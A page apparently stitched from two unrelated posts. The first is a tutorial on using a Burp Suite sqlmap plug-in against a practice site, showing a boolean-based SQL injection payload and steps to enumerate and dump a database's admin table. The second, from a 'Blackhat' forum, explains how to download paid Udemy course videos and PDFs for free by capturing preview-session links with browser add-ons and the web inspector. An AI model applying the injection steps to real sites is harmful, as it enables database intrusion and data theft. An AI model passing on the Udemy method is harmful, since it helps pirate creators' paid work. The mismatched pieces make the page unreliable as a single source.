Bored with theory, now let us see an example. The below URL is a vulnerable site for practicing the SQLI. You can also find the SQLI practice URLs by Googling.

http://192.168.2.3/news-and-events.php?id=22

The id parameter in the above URL is vulnerable to SQLI; let us find it out through our SQLMAP wrapper (Burp suite plug-in).

Open the URL in the browser for which the proxy has been configured. In the proxy (burp) go to the “site map” and click on the URL and send it to the sqlmap by right clicking on the response parameters of the website, as I mentioned previously. Figure (IV) shows you the wrapper opened for the above mentioned URL.



Figure (IV)

The target specifies the URL we are testing, the cookie specifies the cookie or session ID. The wrapper automatically identifies the positions in the URL where SQLI can be injected and specifies a list of the parameters in the “Parameters to test” text area (in our case we have only one possibility for injection which is “id” parameter).

In this example I have configured the SQLMAP wrapper to enumerate the list of databases that are configured in the backend database.



Figure (V)

Figure (V) shows you the output tab which displays how the plug-in tried to exploit the SQLI vulnerability in different ways.

We can see that initially the wrapper tried to exploit the vulnerability by using “Boolean-based blind SQLI” AND by using the operator. The payload shows how the tool tried to exploit the vulnerability. Here we can see the payload: id=22 AND 4626=4626, which is equivalent to the following URL:

http://192.168.2.3/news-and-events.php?id=22 AND 4626=4626

As the URL is always true, the above URL returns the same page as of the original URL.

In the second trail it tried “error-based SQLI”, and later by using UNION operator.



Figure (VI)

From the figure (VI) we can observe more server details like web server, Operating System, and back-end DBMS.

“Information_schema” and “nilakantatrust” are the two databases that are used by the web application.

Now let us try to enumerate all the tables and the columns of the tables from the above databases. To do so configure the SQLMAP wrapper Action field with the option “Enumerate database tables and columns”. Figure (VII) shows you the same.

Figure (VII)

Figure (VIII) shows us the tables of the database “nilakantatrust”.



Figure (VIII)
Let us see the columns of these tables. Figure (IX) shows the columns and their data types of two tables “est_notice” and “est_news” of the nilakantatrust database.



Figure (IX)

We can also dump the complete database by selecting the option “dump dbms databases”. And also store complete data into a file by using the option “save to file” in the output tab.



Figure (X)

Figure (X) shows the dumped data of the table “est_admin” from “nilakantatrust” database and storing it into a file.

Conclusion


SQLMAP is a powerful tool which is used to automate the process of detecting and exploiting the SQLI.
Read more...

Download Any Udemy Video/PDF/Text For Free

Hi guys,

I've seen recently quite a lot of new threads with coupons for free Udemy courses. I did some small research and even though some of you might find it lame and obvious, I hope this method will help. I also hope that none of you has Udemy as your main income because it could harm you. But since this is Blackhat it's ok imho. Ok, let's get to it.

Every paid course got its free 5 minutes preview. That means plenty of time for us to open up every part of course and download videos, save PDFs etc.


After we click that Free Preview button, we'll get to the course dashboard where the parts are listed. Instead of opening it one by one I'm using Chrome addon which is called "Linkclump" (it's downloadable from Chrome Web Store). With this addon the only thing you need to do is to press and hold the right mouse button and select the area where are the links you want to open. It'll open them in new tabs.


Once we got the links opened, there are two options how to obtain the video (PDF is pretty selfexplanatory, only right click and save as works). I use another Chrome addon called "FVD Downloader" (also on Chrome Web Store). Once the tab with video is fully loaded, you just tap the icon of addon in the right up corner and download the video. Now you need to repeat this step for every tab opened.


The alternative way is to use chrome's web inspector and find out the video link in code. It can be found in Sources, then click on folder embed and there is finally the videourl which is made up of the actual videofile on cloudfront server and special generated key and id for your 5 minute "free session". Good thing is that the file doesn't expire immediately after 5 minutes, so you can download it after the 5 minutes run out (it won't end your download in progress too).


These were only some ways how to get the files from Udemy for free. You can use Firefox with Flashgot, possibly iMacros, someone could make a bot. I'm not sure if you can stop the 5 min countdown (don't know if it's on server or client side), if you have JavaScript knowledge you'll figure it out in a second.

It's a bit complicated (many opened tabs), because Udemy generates new key for every Cloudfront file (e. g. every video part).

Feel free to ask any questions! If you apply your own twist, please share it here.

Thx for your attention.
Read more...